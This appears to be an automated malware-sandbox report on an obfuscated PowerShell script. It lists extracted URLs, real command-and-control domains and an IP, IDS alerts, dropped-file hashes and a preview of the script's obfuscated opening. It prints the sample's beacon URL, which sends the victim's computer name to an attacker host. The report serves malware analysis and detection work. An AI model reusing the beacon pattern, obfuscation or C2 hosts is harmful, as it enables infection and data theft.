                        http://schema.org/WebPagepowershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4BB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4B829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4BB2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4B82D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://0.google.com/powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1727138891.000001FE4DD62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://oneget.orgXpowershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.google.compowershell.exe, 00000000.00000002.1727138891.000001FE4AC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://$xf8o4gnevib316q/$17l8kfj5a4enoxz.php?id=$env:computername&key=$dzthxgyfaewj&s=527powershell.exe, 00000000.00000002.1727138891.000001FE49668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4A982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://apis.google.compowershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5973E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1727138891.000001FE49441000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://kcehmenjdibnmni.toppowershell.exe, 00000000.00000002.1727138891.000001FE4AC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4A982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1727138891.000001FE4DD62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5973E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1727138891.000001FE4DCA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1727138891.000001FE49668000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1727138891.000001FE4DCA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/Iconpowershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://0.googlepowershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1727138891.000001FE4DCA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://0.google.powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngXpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://0.google.com/powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1727138891.000001FE49668000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1727138891.000001FE49441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://oneget.orgpowershell.exe, 00000000.00000002.1727138891.000001FE4D962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngpowershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        142.250.185.68
                                                                                                        		www.google.comUnited States
                                                                                                        		15169GOOGLEUSfalse
                                                                                                        45.61.136.138
                                                                                                        		kcehmenjdibnmni.topUnited States
                                                                                                        		40676AS40676USfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1584476
                                                                                                        Start date and time:2025-01-05 16:24:06 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 4m 16s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:7
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:download.ps1
                                                                                                        Detection:MAL
                                                                                                        Classification:mal76.evad.winPS1@2/7@2/2
                                                                                                        EGA Information:Failed
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 14
                                                                                                        • Number of non-executed functions: 2
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .ps1

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7572 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        10:24:58API Interceptor37x Sleep call for process: powershell.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/kqmlncu4i7htr.php?id=user-PC&key=66425560744&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kcehmenjdibnmni.top/mra3hxz5j7htr.php?id=user-PC&key=48227644320&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        kcehmenjdibnmni.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 41.216.189.243
                                                                                                        armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 23.179.122.63
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 193.32.177.34
                                                                                                        EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 193.32.177.34

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):1.1628158735648508
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Nlllulhhf/z:NllU
                                                                                                        MD5:B283C769D040651AA26FFE7F1296E297
                                                                                                        SHA1:F4B1D91D58C72B439EA4CA55A3E75F5F53A117E5
                                                                                                        SHA-256:97677EADF7A2FB6F27A32BAA73C5471A5BA31702A36509AB9FEB478448B2D837
                                                                                                        SHA-512:9114535C2EA58850D30DFA7552F420FBAB32FBFD999B0CAC0B8CB050F27EF65FE5BC3749E78B35A2C489561571B5452182197A51DC2B82ADC6DD70D94BEA03D7
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:@...e................................................@..........

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iog4jihs.vde.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nku1go34.vza.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkfdkrg4.uer.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qi54aj2j.ao5.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6221
                                                                                                        Entropy (8bit):3.7328189059160497
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:+2Jt33CxHjwkvhkvCCtlHn6JkyHeHn6JkyHy:+2JtyDclHnsoHns4
                                                                                                        MD5:BCF89997510874A95F37DC08A09FAE8D
                                                                                                        SHA1:C6B4DAAEA17FE2E2492B024AFE6DD0695203F663
                                                                                                        SHA-256:6CBF77A2A6924836D251E0D6B8656F5A7E8DB966B003D495AACA761B38E651DF
                                                                                                        SHA-512:6C7B729F804AF4843F4033A3A579DC2D175C4FBA818DC268BB39C05628155CF119563681A60C343CFAB36C2B6F1BDA3A8FAC9549AE4E8CF359444B3D6BDAB6CE
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.".. ...-/.v....>.a.._..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........._...^k.._......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^%Z.{...........................%..A.p.p.D.a.t.a...B.V.1.....%Z.{..Roaming.@......CW.^%Z.{............................g.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`............................#.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^%Z.{....Q...........

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CUOJ0UQAXIR6JMUEV2UX.temp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6221
                                                                                                        Entropy (8bit):3.7328189059160497
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:+2Jt33CxHjwkvhkvCCtlHn6JkyHeHn6JkyHy:+2JtyDclHnsoHns4
                                                                                                        MD5:BCF89997510874A95F37DC08A09FAE8D
                                                                                                        SHA1:C6B4DAAEA17FE2E2492B024AFE6DD0695203F663
                                                                                                        SHA-256:6CBF77A2A6924836D251E0D6B8656F5A7E8DB966B003D495AACA761B38E651DF
                                                                                                        SHA-512:6C7B729F804AF4843F4033A3A579DC2D175C4FBA818DC268BB39C05628155CF119563681A60C343CFAB36C2B6F1BDA3A8FAC9549AE4E8CF359444B3D6BDAB6CE
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.".. ...-/.v....>.a.._..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........._...^k.._......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^%Z.{...........................%..A.p.p.D.a.t.a...B.V.1.....%Z.{..Roaming.@......CW.^%Z.{............................g.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`............................#.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^%Z.{....Q...........

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:ASCII text, with very long lines (10733), with CRLF line terminators
                                                                                                        Entropy (8bit):5.997321814512766
                                                                                                        TrID:
                                                                                                          File name:download.ps1
                                                                                                          File size:19'571 bytes
                                                                                                          MD5:9634cf38abc46be36b46474f183913a7
                                                                                                          SHA1:c07fa000b7acd4fef57a14693dc6639e70d0af2b
                                                                                                          SHA256:64a364c581318226bdeee69fdd6097a2b17599e9eaccea487e01c878424ab7fc
                                                                                                          SHA512:8dcd6468f594e8e77539b7103fc31a6601380dfb1e732cf01b8fb693664ae97f7aaa4ee190e37ee1f117c4f4e09d668b5a889799d0f30d926c97995de6a4753f
                                                                                                          SSDEEP:384:G4naz4b54tfQ5UdCi0I3fwHJJOeqeNyNYbhyqGvmTc:G4naz4V4t58Q3fwHfOengyyq5c
                                                                                                          TLSH:55927C6477CED9E2C1C9813D1D02BC187A23B16BE0EB2DC0FAADD5C233696556A58FC1
                                                                                                          File Content Preview:$dknchztum=$executioncontext;$edisataltiononbeorerisanatan = -join (0..54 | ForEach-Object {[char]([int]"000000850000008400000089000000820000008800000086000000880000008700000087000000820000008800000080000000810000008700000084000000880000008600000088000000

                                                                                                          File Icon

                                                                                                          Icon Hash:3270d6baae77db44

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-05T16:25:00.403802+01002859488ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.4594541.1.1.153UDP
                                                                                                          2025-01-05T16:25:01.681401+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.44973045.61.136.13880TCP
                                                                                                          2025-01-05T16:25:01.681401+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.44973045.61.136.13880TCP
                                                                                                          2025-01-05T16:25:02.343076+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449731142.250.185.6880TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 5, 2025 16:25:00.997895956 CET4973080192.168.2.445.61.136.138
                                                                                                          Jan 5, 2025 16:25:01.002989054 CET804973045.61.136.138192.168.2.4
                                                                                                          Jan 5, 2025 16:25:01.003067970 CET4973080192.168.2.445.61.136.138
